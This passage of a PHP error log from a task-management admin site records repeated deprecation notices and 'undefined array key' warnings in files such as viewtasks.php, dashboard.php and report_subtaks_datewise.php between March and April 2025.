deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 18:37:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Mar-2025 18:22:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Mar-2025 19:03:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 11:20:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 13:15:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 13:15:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 13:20:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [27-Mar-2025 13:20:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [27-Mar-2025 14:19:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 14:26:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 16:41:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Mar-2025 16:47:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 10:34:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 11:00:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 11:00:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 11:01:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 11:01:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 12:23:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 12:24:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 13:34:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 16:09:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Apr-2025 16:09:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 16:09:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 16:12:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Apr-2025 16:12:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [04-Apr-2025 16:28:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 10:10:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 10:10:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 10:10:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 10:37:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 10:37:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 10:38:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 10:38:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 13:25:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 13:30:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 13:31:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 13:31:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 14:03:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 14:03:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 14:43:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 15:01:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:01:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 15:13:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:13:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 15:55:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 15:56:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:56:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 15:56:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 15:56:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 16:48:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 17:03:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:03:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:16:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Apr-2025 17:17:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [07-Apr-2025 17:17:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [07-Apr-2025 17:18:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:18:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:23:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:23:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:24:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:24:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:36:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:36:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:40:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:40:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:47:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:47:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Apr-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Apr-2025 17:51:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 06:45:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 06:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 06:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 10:15:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 10:17:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 10:18:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 10:18:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 10:19:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 10:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:19:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 10:19:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 10:19:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:19:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:21:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:21:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:28:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 10:28:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 10:29:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 10:29:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 11:09:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 11:09:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 11:10:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [08-Apr-2025 11:31:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 11:32:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 11:32:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 11:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 11:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 12:42:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 12:42:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 12:42:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 13:23:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 13:23:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 13:23:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 13:38:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 13:38:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 14:02:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 14:02:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 14:07:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 14:07:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 14:24:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Apr-2025 14:24:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [08-Apr-2025 14:34:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 14:34:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 15:08:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Apr-2025 15:08:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:08:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:09:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:09:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 15:09:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 15:09:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:10:44 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Apr-2025 15:11:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Apr-2025 15:11:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Apr-2025 15:12:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Apr-2025 02:39:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 02:39:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Apr-2025 02:39:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Apr-2025 02:40:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 02:40:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 02:40:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Apr-2025 02:40:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Apr-2025 09:00:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 09:00:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Apr-2025 09:00:53 